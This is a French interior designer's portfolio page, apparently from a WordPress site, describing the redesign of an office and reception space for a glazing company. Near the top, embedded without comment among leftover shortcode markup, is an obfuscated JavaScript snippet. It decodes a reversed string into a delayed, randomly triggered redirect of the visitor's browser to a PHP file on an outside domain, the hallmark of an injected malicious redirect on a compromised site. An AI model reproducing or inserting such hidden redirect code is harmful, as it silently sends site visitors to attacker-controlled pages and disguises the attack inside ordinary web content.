DOUBLE BUREAU

»Aménagement

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}double bureau » enable_heading_elem= »yes » elem_type= »square_2″ alignment= »left » heading_elem_color= »#f87815″ main_heading_style= »font-weight:bold; » main_heading_font_size= »desktop:28px; » margin_design_tab_text= » »]

Ces clients – la Miroiterie Vannetaise – souhaitent mettre en valeur l’espace d’accueil ainsi que le bureau technique, attenants à l’atelier de fabrication. Travaillant avec des architectes et architectes d’intérieurs, cette société souhaite valoriser l’esprit déco et architecturé qui est le sien.

J’apporte donc, à ce projet une réflexion globale en agissant sur l’espace. Ouvrant le volume visuellement, je préserve la possibilité de refermer chacun d’eux par des portes coulissantes en verre : fermer sans masquer.

L’agencement des volumes de rangements prolongent cet aspect et sont optimisés afin de permettre un rangement efficace (ensemble rayonnage derrière des portes coulissantes) et à la fois très déco-structurés (espaces ouverts pour échantillon, docs…).